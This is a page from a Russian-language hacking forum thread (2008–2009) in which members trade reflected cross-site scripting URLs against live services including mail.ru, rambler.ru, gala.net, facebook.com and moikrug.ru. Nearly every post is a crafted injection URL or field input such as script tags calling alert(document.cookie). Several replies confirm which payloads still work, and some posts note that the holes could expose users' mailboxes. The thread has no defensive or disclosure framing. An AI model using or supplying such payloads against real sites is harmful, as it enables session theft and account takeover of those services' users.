HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Пассивные xss на почтовых серверах
   
Ответ
Страница 2 из 25 < 1 2 3 4 5 6 12 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.11.2008, 16:59
Luccifer
Познающий
Регистрация: 05.12.2006
Сообщений: 63
С нами: 10227528

Репутация: 100
По умолчанию
Mail.сру
http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phras e=&proto=1&url=%22%3E%3Cscript%3Ealert%28document. cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cper son=&email=&phone=&fax=&address=&keywords=&session _id=16073130&category_id=10993&category_name=%CC%E 5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&p age=1&save=1

http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Lu ccifer')%3C%2Fscript%3E&password=


http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealer t('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4


http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470


http://hosting.mail.ru/
в поле логин вводим
Код:
"><script>alert('xss')</script>
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Luccifer; 25.11.2008 в 17:04..
 
Ответить с цитированием

  #2  
Старый 14.12.2008, 17:56
ImpLex
Познающий
Регистрация: 12.12.2008
Сообщений: 31
С нами: 9164140

Репутация: 68
По умолчанию
http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000 000000000000000000003&pubMode=%3Cscript%3Ealert()% 3C/script%3E
Была активная XSS, но топик для пассивных.
 
Ответить с цитированием

  #3  
Старый 19.12.2008, 22:20
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию
Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5& form=0&hu=1&what=0

</title><script>alert('S0ulVortex')</script>
Последний раз редактировалось S0ulVortex; 19.12.2008 в 22:23..
 
Ответить с цитированием

  #4  
Старый 26.12.2008, 11:24
Jazz
Познающий
Регистрация: 27.09.2008
Сообщений: 67
С нами: 9273736

Репутация: 8
По умолчанию
http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
В поле сайтайта URL вводим:
"><script>alert('Luccifer')</script>


http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert( 'Luccifer')%3C/script%3E=470

уже не работают?или я не то делаю?
 
Ответить с цитированием

  #5  
Старый 26.12.2008, 11:31
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
не работают.
Код:
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E
эта работает.
Последний раз редактировалось faza02; 26.12.2008 в 11:34..
 
Ответить с цитированием

  #6  
Старый 31.12.2008, 21:21
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
С нами: 9389186

Репутация: 573
По умолчанию
Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
Цитата:
http://miss.rambler.ru/srch/?sort=0&set=miss&words=%22%3E%3Cscript%3Ealert(/hacker?/)%3C/script%3E
 
Ответить с цитированием

  #7  
Старый 04.01.2009, 15:37
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию
Gala.net
Код:
http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and
 
Ответить с цитированием

  #8  
Старый 04.01.2009, 18:14
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию
ВШтате
Код:
http://vshtate.ru/reg?op=message&email=[XSS]
Но если авторизован, то не пашет
Короче, бесполезная
В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
Непохек
 
Ответить с цитированием

  #9  
Старый 05.01.2009, 16:05
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию
Facebook.com




Код:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E

только толку от нее нету
 
Ответить с цитированием

  #10  
Старый 12.01.2009, 18:52
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию
Мой Круг [Яндекс]

Цитата:
http://moikrug.ru/mates/search/all/russia/?search="/>XSS
 
Ответить с цитированием
Ответ
Страница 2 из 25 < 1 2 3 4 5 6 12 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.